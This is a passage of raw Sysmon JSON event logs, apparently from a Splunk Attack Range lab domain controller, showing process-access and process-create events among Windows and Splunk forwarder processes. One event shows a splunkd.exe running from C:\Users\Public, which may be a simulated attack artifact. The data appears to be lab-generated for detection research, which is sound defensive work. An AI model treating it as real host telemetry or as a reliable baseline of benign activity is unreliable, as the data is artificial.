C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:50:23.644","SourceProcessGUID":"{E2A3D6B1-106C-5F25-0000-0010ED600300}","SourceProcessId":"3816","SourceThreadId":"3836","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{E2A3D6B1-10AF-5F25-0000-00100DEC0400}","TargetProcessId":"2692","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:50:24","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:50:23","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2849,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:50:23.785\r\nSourceProcessGUID: {E2A3D6B1-10AF-5F25-0000-00100DEC0400}\r\nSourceProcessId: 2692\r\nSourceThreadId: 92\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-0010C1C00200}\r\nTargetProcessId: 2792\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nGrantedAccess: 0x101400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+6025c5|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+6020f6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+59e67|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+5b88c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+8e7d70|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:50:23.785","SourceProcessGUID":"{E2A3D6B1-10AF-5F25-0000-00100DEC0400}","SourceProcessId":"2692","SourceThreadId":"92","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-0010C1C00200}","TargetProcessId":"2792","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","GrantedAccess":"0x101400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+6025c5|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+6020f6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+59e67|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+5b88c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+8e7d70|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:50:24","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:50:24","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2850,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:50:24.240\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3592\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:50:24.240","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3592","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:50:26","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:50:24","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":2851,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:50:24.367\r\nProcessGuid: {E2A3D6B1-10B0-5F25-0000-0010F5ED0400}\r\nProcessId: 3832\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe\r\nFileVersion: 8.0.2\r\nDescription: Network monitor\r\nProduct: Splunk Application\r\nCompany: Splunk Inc.\r\nOriginalFileName: splunk-netmon.exe\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe\"\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {E2A3D6B1-1058-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC\r\nParentProcessGuid: {E2A3D6B1-106B-5F25-0000-0010C1C00200}\r\nParentProcessId: 2792\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 06:50:24.367","ProcessGuid":"{E2A3D6B1-10B0-5F25-0000-0010F5ED0400}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe","FileVersion":"8.0.2","Description":"Network monitor","Product":"Splunk Application","Company":"Splunk Inc.","OriginalFileName":"splunk-netmon.exe","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe\"","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{E2A3D6B1-1058-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC","ParentProcessGuid":"{E2A3D6B1-106B-5F25-0000-0010C1C00200}","ParentProcessId":"2792","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","EventReceivedTime":"2020-08-01 06:50:26","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:50:24","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2852,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:50:24.365\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-0010C1C00200}\r\nSourceProcessId: 2792\r\nSourceThreadId: 4028\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetProcessGUID: {E2A3D6B1-10B0-5F25-0000-0010F5ED0400}\r\nTargetProcessId: 3832\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:50:24.365","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-0010C1C00200}","SourceProcessId":"2792","SourceThreadId":"4028","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetProcessGUID":"{E2A3D6B1-10B0-5F25-0000-0010F5ED0400}","TargetProcessId":"3832","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:50:26","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:50:24","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2853,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:50:24.365\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 2432\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-10B0-5F25-0000-0010F5ED0400}\r\nTargetProcessId: 3832\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:50:24.365","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"2432","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-10B0-5F25-0000-0010F5ED0400}","TargetProcessId":"3832","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:50:26","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:50:24","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2854,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:50:24.365\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:50:24.365","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:50:26","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:50:24","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2855,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:50:24.365\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:50:24.365","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:50:26","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:50:24","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2856,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:50:24.365\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:50:24.365","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"